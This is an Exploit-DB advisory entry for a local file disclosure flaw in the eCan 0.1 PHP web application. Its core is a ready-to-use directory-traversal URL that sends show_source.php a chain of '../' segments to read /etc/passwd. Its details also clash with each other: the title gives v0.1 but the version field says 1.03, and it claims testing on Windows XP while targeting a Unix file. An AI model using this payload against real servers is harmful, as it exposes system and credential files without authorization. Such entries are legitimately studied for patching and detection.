eCan 0.1 - Local File Disclosure

EDB-ID:

19769

CVE:


Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2012-07-12

# Exploit Title: eCan v0.1 => Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/ecan/
# Version: 1.03
# Category::  Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : 	[eCan v0.1]/show_source.php?fid=../../../../../../../../../../../etc/passwd
# See Test :  http://upload.traidnt.net/upfiles/hGq26645.jpg